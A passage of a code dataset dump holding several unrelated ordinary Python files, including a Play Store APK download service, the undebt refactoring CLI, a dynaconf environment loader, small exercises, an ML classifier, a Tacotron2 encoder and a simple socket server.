if details['offer'][0]['formattedAmount'] == 'Free':\n data = self.service.download(app, details['versionCode'])\n else:\n data = self.service.delivery(app, details['versionCode'])\n except IndexError as exc:\n print(exc)\n print('Package %s does not exists' % app)\n unavail.append(app)\n except Exception as exc:\n print(exc)\n print('Failed to download %s' % app)\n failed.append(app)\n else:\n filename = app + '.apk'\n filepath = os.path.join(self.download_path, filename)\n try:\n open(filepath, 'wb').write(data['data'])\n except IOError as exc:\n print('Error while writing %s: %s' % (filename, exc))\n failed.append(app)\n details['filename'] = filename\n success.append(details)\n for x in success:\n self.insert_app_into_state(x)\n return {'status': 'SUCCESS',\n 'message': {'success': success,\n 'failed': failed,\n 'unavail': unavail}}\n\n def check_local_apks(self):\n if not self.loggedIn:\n return {'status': 'UNAUTHORIZED'}\n if len(self.currentSet) == 0:\n print('There is no package')\n return {'status': 'SUCCESS',\n 'message': []}\n else:\n toUpdate = []\n for app in self.currentSet:\n details = self.details(app['docId'])\n if details is None:\n print('%s not available in Play Store' % app['docId'])\n continue\n if self.debug:\n print('Checking %s' % app['docId'])\n print('%d == %d ?' % (app['versionCode'], details['versionCode']))\n if app['versionCode'] != details['versionCode']:\n toUpdate.append(details['docId'])\n return {'status': 'SUCCESS',\n 'message': toUpdate}\n\n def remove_local_app(self, docId):\n if not self.loggedIn:\n return {'status': 'UNAUTHORIZED'}\n # get app from cache\n app = list(filter(lambda x: x['docId'] == docId, self.currentSet))\n if len(app) < 1:\n return {'status': 'ERROR'}\n apkPath = os.path.join(self.download_path, app[0]['filename'])\n if os.path.isfile(apkPath):\n os.remove(apkPath)\n self.currentSet.remove(app[0])\n return {'status': 'SUCCESS'}\n return {'status': 'ERROR'}\n","sub_path":"playmaker/service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":12877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"426660528","text":"# -*- coding: utf-8 -*-\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport argparse\nimport multiprocessing\nimport os\nimport sys\nimport time\nimport traceback\n\nfrom undebt.cmd import logger\nfrom undebt.cmd.logger import log\nfrom undebt.cmd.logic import process\nfrom undebt.pattern.interface import patterns_from_files\n\n\ndef _exit_fail_upon_error(func):\n\n def try_except(*args, **kwargs):\n try:\n return func(*args, **kwargs)\n except Exception as err:\n log.exception(str(err))\n sys.exit(1)\n\n return try_except\n\n\n@_exit_fail_upon_error\ndef _load_text(path):\n if path is None:\n file_obj = sys.stdin\n else:\n file_obj = open(path, 'r')\n\n try:\n return file_obj.read()\n finally:\n if path:\n file_obj.close()\n\n\n@_exit_fail_upon_error\ndef _write_result_text(result_text, path, dry_run):\n if not dry_run and path:\n with open(path, 'w') as file_obj:\n file_obj.write(result_text)\n else:\n if path:\n print('>>> {}'.format(path), file=sys.stderr)\n sys.stdout.write(result_text)\n\n\n@_exit_fail_upon_error\ndef _handle_arguments():\n parser = argparse.ArgumentParser(prog='undebt')\n parser.add_argument(\n 'paths', nargs='*', metavar='PATH',\n help='paths to files or directories (searches for extension recursively) to be modified; '\n 'uses stdin if not passed')\n parser.add_argument(\n '--pattern', '-p', metavar='PATH', action='append', required=True,\n help='paths to pattern definition files')\n parser.add_argument(\n '--extension', '-e', metavar='EXT', action='append',\n help='extensions of files to be modified when searching a directory')\n parser.add_argument(\n '--jobs', '-j', metavar='INTEGER', type=int, default=16,\n help='number of processes to run in parallel (default is 16)')\n parser.add_argument(\n '--verbose', '-v', action='store_true', default=False,\n help='verbose logging for troubleshooting')\n parser.add_argument(\n '--dry-run', '-d', action='store_true', default=False,\n help='only print to stdout; do not overwrite files')\n return parser.parse_args()\n\n\n@_exit_fail_upon_error\ndef _fix_exts(extensions):\n if extensions is None:\n return None\n\n new_exts = []\n for ext in extensions:\n if ext.startswith(\".\"):\n new_exts.append(ext[1:])\n else:\n new_exts.append(ext)\n return new_exts\n\n\n@_exit_fail_upon_error\ndef _find_files(paths, extensions):\n if paths is None:\n return\n\n for path in paths:\n\n if os.path.isfile(path):\n yield path\n\n else:\n for root, dirs, files in os.walk(path):\n\n for f in files:\n ext = os.path.splitext(f)[-1].lstrip('.')\n\n if extensions is None:\n log.error('must pass --extension when --input is a directory')\n sys.exit(1)\n\n if ext in extensions:\n yield os.path.join(root, f)\n\n for d in dirs[:]:\n if d != \".\" * len(d) and d.startswith(\".\"): # ignore .*\n dirs.remove(d)\n\n\ndef _process_file(patterns, text_file, dry_run):\n log.info('undebting {}'.format(text_file))\n\n text = _load_text(text_file)\n\n try:\n result_text = process(patterns, text)\n except Exception:\n log.exception(traceback.format_exc())\n return False\n else:\n if result_text != text:\n _write_result_text(result_text, text_file, dry_run)\n return True\n\n\nclass _file_processor(object):\n \"\"\"Must be a class so it is pickleable.\"\"\"\n\n def __init__(self, pattern_files, dry_run):\n self.pattern_files = pattern_files\n self.dry_run = dry_run\n\n @_exit_fail_upon_error\n def patterns(self):\n return patterns_from_files(self.pattern_files)\n\n def __call__(self, text_file):\n return _process_file(self.patterns(), text_file, self.dry_run)\n\n\ndef main():\n \"\"\"Handle and process arguments from sys.argv.\"\"\"\n logger.setup()\n args = _handle_arguments()\n logger.setup(args.verbose) # Reset logging level\n\n if args.jobs <= 0:\n log.error('number of processes must be > 0')\n sys.exit(1)\n\n processor = _file_processor(args.pattern, args.dry_run)\n files = list(_find_files(args.paths, _fix_exts(args.extension)))\n\n if bool(files) != bool(args.paths):\n log.error('could not find any files for the given paths and extension')\n sys.exit(1)\n\n if not files: # Single process mode if stdin\n log.info('running in stdin/stdout mode')\n processor(None)\n\n elif len(files) == 1 or args.jobs == 1: # Single process if only one file or only one process\n log.info('running across {} file(s) using a single process'\n .format(len(files)))\n processor(files[0])\n\n else:\n process_pool = multiprocessing.Pool(args.jobs)\n try:\n\n result = process_pool.map_async(\n processor,\n files,\n )\n process_pool.close()\n\n log.info('running across {} file(s) using {} processes'\n .format(len(files), args.jobs))\n\n # Cannot do process_pool.wait() because it prevents KeyboardInterrupt from being sent\n # See http://stackoverflow.com/questions/1408356/keyboard-interrupts-with-pythons-multiprocessing-pool\n while not result.ready():\n time.sleep(0.01)\n\n if not result.successful():\n log.error('multiprocessing failed (are your replace functions pickleable?)')\n sys.exit(1)\n\n result = result.get()\n assert len(result) == len(files)\n if not all(result):\n log.error('failed to process {} files'\n .format(len(result) - sum(result)))\n sys.exit(1)\n\n except:\n process_pool.terminate()\n raise\n finally:\n process_pool.join()\n","sub_path":"undebt/cmd/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"536691697","text":"\"\"\"\nThis problem was asked by Twitter.\n\nYou run an e-commerce website and want to record the last N order ids in a log.\nImplement a data structure to accomplish this, with the following API:\n\n * record(order_id): adds the order_id to the log\n * get_last(i): gets the ith last element from the log. i is guaranteed to be\n smaller than or equal to N.\n\nYou should be as efficient with time and space as possible.\n\"\"\"\nclass Log:\n def __init__(self, size):\n self.size = size\n self.data = [None for i in range(size)]\n self.f = -1\n self.r = -1\n\n\n def record(self, order_id):\n self.f = (self.f + 1) % self.size\n if self.r == -1 or self.f == self.r:\n self.r = (self.r + 1) % self.size\n\n self.data[self.f] = order_id\n\n\n def get_last(self, i):\n index = (self.f - i + 1 + self.size) % self.size\n return self.data[index]\n\n\n def __str__(self):\n result = \"Log :\"\n index = self.r\n while index != self.f:\n result += \"\\n\\t{}\".format(self.data[index])\n index = (index + 1) % self.size\n result += \"\\n\\t{}\".format(self.data[index])\n result += \"\\n\\n\"\n return result\n\n\nif __name__ == '__main__':\n log = Log(3)\n\n log.record(\"US123\")\n print(log)\n log.record(\"US456\")\n print(log)\n log.record(\"US789\")\n print(log)\n log.record(\"UK123\")\n print(log)\n log.record(\"UK456\")\n print(log)\n\n print(log.get_last(1))\n print(log.get_last(2))\n print(log.get_last(3))\n","sub_path":"problems/dcp0016.py","file_name":"dcp0016.py","file_ext":"py","file_size_in_byte":1520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"39287344","text":"# ex17_3.py\nfrom PIL import Image\n\nmywidth, myheight = 99, 127\nhungPic = Image.open(\"hung.jpg\") # 建立Pillow物件\nwidth, height = hungPic.size\nnewPic = hungPic.resize((mywidth, myheight))\n\nwidth, height = 634, 548 # 新影像寬與高\nnewImage = Image.new('RGB', (width, height), \"Yellow\") # 建立新影像\nfor x in range(20, width-20, mywidth): # 雙層迴圈合成\n for y in range(20, height-20, myheight):\n newImage.paste(newPic, (x, y)) # 合成\n\nnewImage.save(\"fig17_3.jpg\") # 儲存\n\n\n\n\n\n\n\n\n\n","sub_path":"04_The_Path_of_Python/T-resource_Python_201904/ex/ex17_3.py","file_name":"ex17_3.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"306373895","text":"# coding: utf-8\nimport os\nfrom dynaconf.utils.parse_conf import parse_conf_data\n\nIDENTIFIER = 'env_loader'\n\n\ndef load(obj, namespace=None, silent=True, key=None):\n default_namespace = obj.get('NAMESPACE_FOR_DYNACONF')\n # load all from default namespace (this never gets cleaned)\n load_from_env(\n IDENTIFIER,\n key,\n default_namespace,\n obj,\n silent\n )\n\n # rewrite with different namespace if provided\n if namespace and namespace != default_namespace:\n identifier = IDENTIFIER + '_' + namespace.lower()\n load_from_env(identifier, key, namespace, obj, silent)\n\n\ndef load_from_env(identifier, key, namespace, obj, silent):\n NAMESPACE = namespace.upper() # noqa\n NAMESPACE_ = '{0}_'.format(NAMESPACE) # noqa\n try:\n if key:\n value = os.environ.get(\n '{0}_{1}'.format(NAMESPACE, key)\n )\n if value:\n obj.logger.debug(\n \"env_loader:loading by key: %s:%s (%s)\",\n key,\n value,\n identifier\n )\n obj.set(key, value, loader_identifier=identifier)\n else:\n data = {\n key.partition(NAMESPACE_)[-1]: parse_conf_data(data)\n for key, data\n in os.environ.items()\n if key.startswith(NAMESPACE_)\n }\n obj.logger.debug(\n \"env_loader:loading:%s (%s)\",\n data,\n identifier\n )\n obj.update(data, loader_identifier=identifier)\n except Exception as e: # pragma: no cover\n e.message = (\n 'Unable to load config env namespace ({0})'\n ).format(str(e))\n if silent:\n obj.logger.error(str(e))\n else:\n raise\n\n\ndef clean(obj, namespace, silent=True): # noqa\n for identifier, data in obj.loaded_by_loaders.items():\n if identifier.startswith('env_loader'):\n for key in data:\n obj.logger.debug(\"cleaning: %s (%s)\", key, identifier)\n obj.unset(key)\n","sub_path":"dynaconf/loaders/env_loader.py","file_name":"env_loader.py","file_ext":"py","file_size_in_byte":2142,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"547396175","text":"from ddt import ddt, file_data\nfrom django.test import Client\nfrom django.test import TestCase\nfrom datetime import datetime\nfrom django.utils import timezone\nimport time\n\n\nfrom ..models import User, Tweet\n\n\n@ddt\nclass TestTwitter(TestCase):\n\n def setUp(self):\n self.client = Client()\n User.objects.create(username='user2', email_id='user2@gmail.com', active_status=0)\n User.objects.create(username='user3', email_id='user3@gmail.com', active_status=1)\n User.objects.create(username='user4', email_id='user4@gmail.com', active_status=1)\n Tweet.objects.create(tweet_hashtag=\"#ABC\", tweet_content=\"ABC\", tweeted_at=datetime.now(tz=timezone.utc), tweeted_by=User.objects.get(username='user4'))\n time.sleep(1)\n Tweet.objects.create(tweet_hashtag=\"#ABC\", tweet_content=\"ABC\", tweeted_at=datetime.now(tz=timezone.utc), tweeted_by=User.objects.get(username='user4'))\n time.sleep(1)\n Tweet.objects.create(tweet_hashtag=\"#ABC\", tweet_content=\"ABC\", tweeted_at=datetime.now(tz=timezone.utc), tweeted_by=User.objects.get(username='user4'))\n time.sleep(1)\n Tweet.objects.create(tweet_hashtag=\"#ABC\", tweet_content=\"ABC\", tweeted_at=datetime.now(tz=timezone.utc), tweeted_by=User.objects.get(username='user4'))\n time.sleep(1)\n Tweet.objects.create(tweet_hashtag=\"#ABC\", tweet_content=\"ABC\", tweeted_at=datetime.now(tz=timezone.utc), tweeted_by=User.objects.get(username='user4'))\n\n @file_data('../data/test_data_twitter.json')\n def test_twitter(self, url, method, input, expected_output):\n # Setup Part\n payload = input\n\n # Response Part\n if method == \"GET\":\n response = self.client.get(\n url, payload\n )\n elif method == \"POST\":\n response = self.client.post(\n url, payload\n )\n\n # Assert Part\n\n response_json = response.json()\n self.assertEqual(response.status_code, expected_output['status_code'])\n self.assertEqual(response_json['message'], expected_output['data']['message'])\n self.assertEqual(response_json['error'], expected_output['data']['error'])\n self.assertEqual(response_json['data'], expected_output['data']['data'])\n","sub_path":"twitter_proj/tweet_api/tests/test_ddt_twitter.py","file_name":"test_ddt_twitter.py","file_ext":"py","file_size_in_byte":2266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"141447671","text":"# check triangles\n#\n# a valid triangle is where sum of any two sides > 3rd side\n#\n\ndef is_triangle(side0, side1, side2):\n\n s0 = int(side0)\n s1 = int(side1)\n s2 = int(side2)\n if s0 + s1 > s2 and \\\n s1 + s2 > s0 and \\\n s2 + s0 > s1:\n return True\n\n return False\n\n\n\ndef check_triangles_in_col( col ):\n # now go thru each col\n num_triangles = 0\n for i in range(0,len(col),3):\n if is_triangle(col[i], col[i+1], col[i+2]):\n num_triangles += 1\n return num_triangles\n\n\ndef check_triangles():\n f = open('input.txt', 'r')\n col1 = []\n col2 = []\n col3 = []\n for line in f:\n line = line.rstrip()\n sides = line.split()\n col1.append(sides[0])\n col2.append(sides[1])\n col3.append(sides[2])\n\n triangles = check_triangles_in_col(col1)\n triangles += check_triangles_in_col(col2)\n triangles += check_triangles_in_col(col3)\n\n print(\"Number of triangles %i\" % triangles)\n\n\ncheck_triangles()\n\n","sub_path":"python_lab/day03/check_triangles2.py","file_name":"check_triangles2.py","file_ext":"py","file_size_in_byte":996,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"12672217","text":"from collections import defaultdict\nN = int(input())\n\nSP = defaultdict(list)\nfor i in range(1, N + 1):\n S, P = input().split()\n SP[S].append((int(P), i))\n\nitems = list(SP.items())\nitems.sort()\nfor _, A in items:\n A.sort(reverse=True)\n for _, i in A:\n print(i)\n\n","sub_path":"AtCoder/abc/128b_2.py","file_name":"128b_2.py","file_ext":"py","file_size_in_byte":280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"325683321","text":"#\n# Copyright (C) 2014-2023 S[&]T, The Netherlands.\n#\n\nfrom __future__ import absolute_import, division, print_function\n\nimport muninn\n\nfrom .utils import create_parser, parse_args_and_run\n\n\ndef run(args):\n with muninn.open(args.archive) as archive:\n print(\"NAMESPACES\")\n for namespace in sorted(archive.namespaces()):\n print(\" %s\" % namespace)\n namespace_schema = archive.namespace_schema(namespace)\n for name in sorted(namespace_schema):\n field = namespace_schema[name]\n field_name = field.name()\n if field.__module__ != 'muninn.schema':\n field_name = '%s.%s' % (field.__module__, field.name())\n optional = namespace_schema.is_optional(name)\n print(\" %s: %s%s\" % (name, field_name, \" (optional)\" if optional else \"\", ))\n\n print(\"\\nPRODUCT TYPES\")\n for product_type in sorted(archive.product_types()):\n print(\" %s\" % product_type)\n\n if archive.remote_backends():\n print(\"\\nREMOTE BACKENDS\")\n for remote_backend in sorted(archive.remote_backends()):\n print(\" %s\" % remote_backend)\n\n return 0\n\n\ndef main():\n parser = create_parser(description=\"Display generic information about the archive.\")\n parser.add_argument(\"archive\", metavar=\"ARCHIVE\", help=\"identifier of the archive to use\")\n return parse_args_and_run(parser, run)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"muninn/tools/info.py","file_name":"info.py","file_ext":"py","file_size_in_byte":1495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"12593822","text":"# Author(s): Kermit Mitchell III, Zeke Hammonds\n# Start Date: 05/06/2019 5:30 PM | Last Editied: 12/15/2020 1:00 PM\n# This code uses the trained Pokedex SVMs to identify the Pokemon in an given image.\n\n# Essential Imports\nimport cv2 as cv # Image processing like HoG\nimport numpy as np # Fast matrix manipulation\nfrom matplotlib import pyplot as plt # Graphing data\nfrom sklearn import svm as SVM # machine learning models\nimport sklearn\nfrom joblib import dump, load # saving and writing PCA/SVM\nimport os # file system access\nimport sys # for debugging and terminal print length\n\n#print('The scikit-learn version is {}.'.format(sklearn.__version__))\n\n## Relevant folder paths for ours SVMS, PCAs, and HOGs\nsvmFolderPath = './SVM/'\npcaFolderPath = './PCA/'\nhogFolderPath = './HOG/'\n\n# A vector of our labels, used below\nlabelVector = [\"pikachu\", \"bulbasaur\", \"charmander\", \"squirtle\", \"ditto\"] \n\n# This is our HOG Descriptor, and will be used for feature extraction\nIMG_SIZE = 224 # the size of our imcoming images\nwinSize = (IMG_SIZE, IMG_SIZE) # same size as images\nblockSize = (IMG_SIZE // 4, IMG_SIZE // 4) # (224/4)=56\nblockStride = (IMG_SIZE // 8, IMG_SIZE // 8) # sliding window processes blocks by cell size\ncellSize = (IMG_SIZE // 8, IMG_SIZE // 8) # same as above ^\nL2HysThreshold = 0.2\nnbins = 9 # angles from 0-180, increments of 20 degrees\n\nhog = cv.HOGDescriptor(winSize, blockSize, blockStride, cellSize, nbins, 1, 4, 0, 0.2, 0)\n\n# Load in the trained Pokedex SVMs\nsvm0 = load(svmFolderPath + 'pikachuSVM.joblib')\nsvm1 = load(svmFolderPath + 'bulbasaurSVM.joblib')\nsvm2 = load(svmFolderPath + 'charmanderSVM.joblib')\nsvm3 = load(svmFolderPath + 'squirtleSVM.joblib')\n\n# Returns the hog-pca matrix based on the input Pokemon\ndef pokePCA(hogMatrix, pokemon):\n PCA_Mean = load(pcaFolderPath + pokemon + 'PCA_Mean.joblib')\n PCA_Eigen = load(pcaFolderPath + pokemon + 'PCA_Eigen.joblib')\n pca = cv.PCAProject(hogMatrix, PCA_Mean, PCA_Eigen)\n return pca\n\n# Enter in the filepath and name of the image, and predicts which Pokemon it is\ndef predictPokemon(testImgURL):\n #testImgURL = \"pikachu_kerem.jpg\"#bulbasaurTestingData[24]\n # ^ replace with the actual test image from camera\n #bulbasaurTestingData[30] <-- if you wanted to test from testing set instead\n\n testImg = cv.imread(testImgURL)\n if testImg is None:\n print(\"Invalid file or incorrect path.\")\n quit()\n testImg = cv.resize(testImg, (IMG_SIZE, IMG_SIZE))\n #cv.imshow(testImgURL, testImg)\n #cv.waitKey(0)\n #cv.destroyAllWindows()\n\n # Run this image through HOG and PCA for each Pokemon\n\n testImgHOG = hog.compute(testImg, winSize)\n testImgHOG = testImgHOG.transpose()\n\n pikachuTestImgHOG = pokePCA(testImgHOG, labelVector[0])\n bulbasaurTestImgHOG = pokePCA(testImgHOG, labelVector[1])\n charmanderTestImgHOG = pokePCA(testImgHOG, labelVector[2])\n squirtleTestImgHOG = pokePCA(testImgHOG, labelVector[3])\n\n scoreScaler = 1 # used to scale the scores for readability\n predictions = np.empty((4, 2)) # the final predictions of all 4 SVMs\n predictions[0][0] = (int)(svm0.predict(pikachuTestImgHOG)[0])\n predictions[0][1] = round((svm0.score_samples(pikachuTestImgHOG))[0], 4) * scoreScaler\n predictions[1][0] = (int)(svm1.predict(bulbasaurTestImgHOG)[0])\n predictions[1][1] = round((svm1.score_samples(bulbasaurTestImgHOG))[0], 4) * scoreScaler\n predictions[2][0] = (int)(svm2.predict(charmanderTestImgHOG)[0])\n predictions[2][1] = round((svm2.score_samples(charmanderTestImgHOG))[0], 4) * scoreScaler\n predictions[3][0] = (int)(svm3.predict(squirtleTestImgHOG)[0])\n predictions[3][1] = round((svm3.score_samples(squirtleTestImgHOG))[0], 4) * scoreScaler\n print(predictions)\n\n # Calculate the max prediction score, and select the final result\n currentMaxIndex = -1\n currentMaxValue = sys.float_info.min\n for i in range(predictions.shape[0]):\n if(predictions[i][1] > currentMaxValue):\n currentMaxValue = predictions[i][1]\n currentMaxIndex = i\n\n finalAnswer = labelVector[currentMaxIndex]\n threshold = 1.0 * (10**-2) # Eliminates scores that are too low\n if(currentMaxValue < threshold or currentMaxIndex == -1):\n finalAnswer = \"Ditto\" # this means the testImg was neither class aka inconclusive\n\n #print('Final Prediction:', finalAnswer)\n #cv.imshow(testImgURL, testImg)\n #cv.waitKey(0)\n #cv.destroyAllWindows()\n\n #print(finalAnswer)\n return finalAnswer\n\n# Tests an individual image\nmyImgUrl = input(\"Enter an image (filepath and filename) of Pikachu, Bulbasaur, Charmander, or Squirtle: \")\n#\"Revisions/bulbagrey.png\" # This would be the filename and path\nprint(predictPokemon(myImgUrl))\nmyTestImg = cv.imread(myImgUrl)\ncv.imshow(myImgUrl, myTestImg)\ncv.waitKey(0)\ncv.destroyAllWindows()","sub_path":"pokedex_classify_image.py","file_name":"pokedex_classify_image.py","file_ext":"py","file_size_in_byte":4727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"538593145","text":"# Copyright (c) 2020, Soohwan Kim. All rights reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport torch.nn as nn\nfrom torch import Tensor\nfrom typing import Optional\nfrom tacotron2.modules import ConvBlock\n\n\nclass Encoder(nn.Module):\n \"\"\"\n Encoder of Tacotron2`s Spectrogram Prediction Network.\n The encoder converts a character sequence into a hidden feature representation which the decoder\n consumes to predict a spectrogram. Default values are those in the paper.\n\n Args:\n vocab_size (int): size of character vocab\n embedding_dim (int): dimension of character embedding layer (default: 512)\n encoder_lstm_dim (int): dimension of rnn hidden state vector (default: 256)\n num_lstm_layers (int): number of rnn layers (default: 1)\n conv_dropout_p (float): dropout probability of convolution layer (default: 0.5)\n num_conv_layers (int): number of convolution layers (default: 3)\n conv_kernel_size (int): size of convolution layer`s kernel (default: 5)\n lstm_bidirectional (bool): if True, becomes bidirectional rnn (default: True)\n device (str): cuda or cpu (default: cuda)\n\n Inputs: inputs, input_lengths\n - **inputs**: list of sequences, whose length is the batch size and within which each sequence is list of tokens\n - **input_lengths**: list of sequence lengths\n\n Returns: output\n - **output**: tensor containing the encoded features of the input character sequences\n \"\"\"\n\n def __init__(\n self,\n vocab_size: int, # size of character vocab\n embedding_dim: int = 512, # dimension of character embedding layer\n encoder_lstm_dim: int = 256, # dimension of lstm hidden state vector\n num_lstm_layers: int = 1, # number of lstm layers\n conv_dropout_p: float = 0.5, # dropout probability of convolution layer\n num_conv_layers: int = 3, # number of convolution layers\n conv_kernel_size: int = 5, # size of convolution layer`s kernel\n lstm_bidirectional: bool = True, # if True, becomes bidirectional lstm\n device: str = 'cuda' # cuda or cpu\n ) -> None:\n super(Encoder, self).__init__()\n self.embedding = nn.Embedding(vocab_size, embedding_dim)\n self. conv_layers= nn.Sequential(*[\n ConvBlock(\n embedding_dim,\n embedding_dim,\n kernel_size=conv_kernel_size,\n padding=int((conv_kernel_size - 1) / 2),\n dropout_p=conv_dropout_p\n ) for _ in range(num_conv_layers)\n ])\n self.lstm = nn.LSTM(\n input_size=embedding_dim,\n hidden_size=encoder_lstm_dim,\n num_layers=num_lstm_layers,\n batch_first=True,\n bias=True,\n bidirectional=lstm_bidirectional\n )\n self.device = device\n\n def forward(self, inputs: Tensor, input_lengths: Optional[Tensor] = None) -> Tensor:\n inputs = self.embedding(inputs)\n inputs = inputs.transpose(1, 2)\n\n inputs = self.conv_layers(inputs)\n inputs = inputs.transpose(1, 2)\n\n if input_lengths is not None:\n output = nn.utils.rnn.pack_padded_sequence(inputs, input_lengths, batch_first=True)\n self.lstm.flatten_parameters()\n output, _ = self.lstm(output)\n output, _ = nn.utils.rnn.pad_packed_sequence(output, batch_first=True)\n\n else:\n self.lstm.flatten_parameters()\n output, _ = self.lstm(inputs)\n\n return output\n","sub_path":"tacotron2/encoder.py","file_name":"encoder.py","file_ext":"py","file_size_in_byte":4182,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"350319117","text":"test=0\ndef Jakob():\n print (\"Jakob\")\n\n\ndef Josh():\n print (\"Josh\")\n\ndef Patrick():\n print (\"Patrick\")\n\n \ndef Vish():\n print (\"Vish\") \n\ndef Sharan():\n print (\"Sharan\")\n\ndef Chris():\n pick=0\n print (\"So Yoda is supposed to study but his age has proven that there are better ways!\")\n print (\"\"\"How are you going to get closer to the teacher?:\n 1.Hope that the teacher is a \"Star Wars\" fan.\n 2.Try to use the force and hope for the best.\"\"\")\n \n while pick not in [1,2]:\n pick=int(input(\"Two paths choose you may....:\"))\n \n if pick==1:\n print (\"Ops the teachers seems to be on the dark side....\\n\")\n print (\"\"\"\n 1.Pretend to be a green ugly house elf from Harry Potter and ask for clothes!\n 2.Preting using the force in order to joke with him!\"\"\")\n \n pick=0 \n while pick not in [1,2]:\n pick=int(input(\"Two paths choose you may....:\"))\n\n if pick in [1,2]:\n print (\"The teacher didn't like this and strangled you!\")\n print (\"\"\"\n P.I.R YODA\"\"\")\n test=input(\"\")\n \n elif pick==2:\n print (\"The force didn't work.....The teacher seems to be a Sith!\")\n print (\"\"\"\n 1.Join the dark force\n 2.Confuse him by your inversed random gibberish\"\"\")\n \n pick=0\n while pick not in [1,2]:\n pick=int(input(\"Two paths choose you may....:\"))\n\n if pick in [1,2]:\n print (\"The teacher didn't like this and strangled you!\")\n print (\"\"\"\n P.I.R YODA\"\"\")\n test=input(\"\")\n \n \n \n \n \n \n\n\n\n\n\nCourse=0\nTrait=0\nprint(\"Yoda has arrived on Earth and has decided to attend university.\")\nprint(\"Yoda first has to decide on which course to enrol on.\")\nprint(\"\"\"\n1.Computing\n2.Dance\n3.Aeronotical Engineering\"\"\")\nCourse= int(input(\": \"))\nprint(\"As Yoda maturs reaching the age 103839221821x10^829\")\nprint(\"He has developed some new charactrer traits\")\nprint(\"\"\"\n1. Addictive tendantices\n2. Teachers Pet\"\"\")\nTrait = int(input(\": \"))\nif Course == 1:\n \n if Trait == 1:\n \n Vish()\n\n else:\n \n Chris()\n \n \nif Course == 2:\n \n if Trait == 1:\n \n Josh()\n \n else:\n \n Sharan()\n \nif Course == 3:\n \n if Trait == 1:\n \n Patrick()\n \n else:\n \n Jakob()\n","sub_path":"YodaAtUniChris.py","file_name":"YodaAtUniChris.py","file_ext":"py","file_size_in_byte":2446,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"56828048","text":"from headspace.associative import Link\nfrom headspace.associative import PyAssoConfigFlag\n\n\ndef create_example_config():\n cache_deps = [[Link(index=0, prev=True)],\n [Link(index=0, prev=True)],\n [Link(index=1, prev=False),\n Link(index=0, prev=True)]]\n\n indicator_deps = [[Link(index=0, prev=True)], []]\n indicator_cache = [[0], []]\n\n expansion_deps = [[Link(index=1, prev=False)]]\n expansion_indicator = [[1]]\n expansion_cache = [[]]\n\n flags = PyAssoConfigFlag(\n summary='AverageSummary',\n summary_config='',\n value='MaxValueUpdate',\n value_config='',\n cache_deps=cache_deps,\n indicator_cache=indicator_cache,\n indicator_deps=indicator_deps,\n expansion_cache=expansion_cache,\n expansion_deps=expansion_deps,\n expansion_indicator=expansion_indicator)\n\n return flags\n","sub_path":"headspace/tests/example_config.py","file_name":"example_config.py","file_ext":"py","file_size_in_byte":910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"226065249","text":"import socket\nfrom _thread import *\n\n# 쓰레드에서 실행되는 코드입니다.\n# 접속한 클라이언트마다 새로운 쓰레드가 생성되어 통신을 하게 됩니다.\ndef threaded(client_socket, addr):\n print('Connected by :', addr[0], ':', addr[1])\n\n # 클라이언트가 접속을 끊을 때 까지 반복합니다.\n while True:\n\n try:\n # 데이터가 수신되면 클라이언트에 다시 전송합니다.(에코)\n data = client_socket.recv(1024)\n\n if not data:\n print('Disconnected by ' + addr[0], ':', addr[1])\n break\n\n decoded_data = str(data.decode())\n print('Received from ' + addr[0], ':', addr[1], data.decode())\n\n if (\"2@\" in decoded_data) :\n if (\"강아지\" in decoded_data):\n client_socket.send(\"0@\".encode())\n else :\n client_socket.send(\"2@14@강아지\".encode())\n\n\n elif (\"1@\" in decoded_data):\n if \"1호선\" in decoded_data:\n client_socket.send(\"1@형진역@주홍역@효상역@영욱역@강아지@고양이@사자\".encode())\n elif \"2호선\" in decoded_data:\n client_socket.send(\"1@애플역@과자역@사과역@등등역@하이염\".encode())\n else :\n client_socket.send(\"1@��성역@가방역@충전기@역우역@우웩염\".encode())\n\n\n except ConnectionResetError as e:\n\n print('Disconnected by ' + addr[0], ':', addr[1])\n break\n\n client_socket.close()\n\n\nHOST = '127.0.0.1'\nPORT = 9997\n\nserver_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nserver_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\nserver_socket.bind((HOST, PORT))\nserver_socket.listen()\n\nprint('server start')\n\n# 클라이언트가 접속하면 accept 함수에서 새로운 소켓을 리턴합니다.\n# 새로운 쓰레드에서 해당 소켓을 사용하여 통신을 하게 됩니다.\nwhile True:\n print('wait')\n\n client_socket, addr = server_socket.accept()\n start_new_thread(threaded, 